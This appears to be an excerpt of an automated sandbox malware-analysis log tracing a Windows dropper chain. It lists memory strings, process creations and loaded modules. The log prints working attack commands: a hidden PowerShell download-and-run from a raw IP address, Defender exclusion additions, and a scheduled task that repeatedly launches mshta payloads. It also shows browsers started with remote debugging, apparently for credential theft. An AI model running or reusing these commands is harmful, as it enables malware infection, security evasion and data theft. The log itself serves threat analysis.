                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578895334.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578799964.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1590194970.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1590083144.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.2070231407.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941073654.00000000059D5000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2343336888.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2318127176.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2325919974.0000000003A6D000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4811996878.000000000349A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2228008361.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2218666342.0000000005AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                    Source: EdYEXasNiR.exeVirustotal: Detection: 56%
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile read: C:\Users\user\Desktop\EdYEXasNiR.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\EdYEXasNiR.exe "C:\Users\user\Desktop\EdYEXasNiR.exe"
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe "C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe"
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeProcess created: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe "C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2148,i,10048407555887453736,9436864136807657335,262144 /prefetch:3
                                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2008,i,2217384488025341277,266429373537081613,262144 /prefetch:3
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\wOXcVegx\jyidkjkfhjawd.exe "C:\wOXcVegx\jyidkjkfhjawd.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\wOXcVegx\jyidkjkfhjawd.exe "C:\wOXcVegx\jyidkjkfhjawd.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe Process created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe Process created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
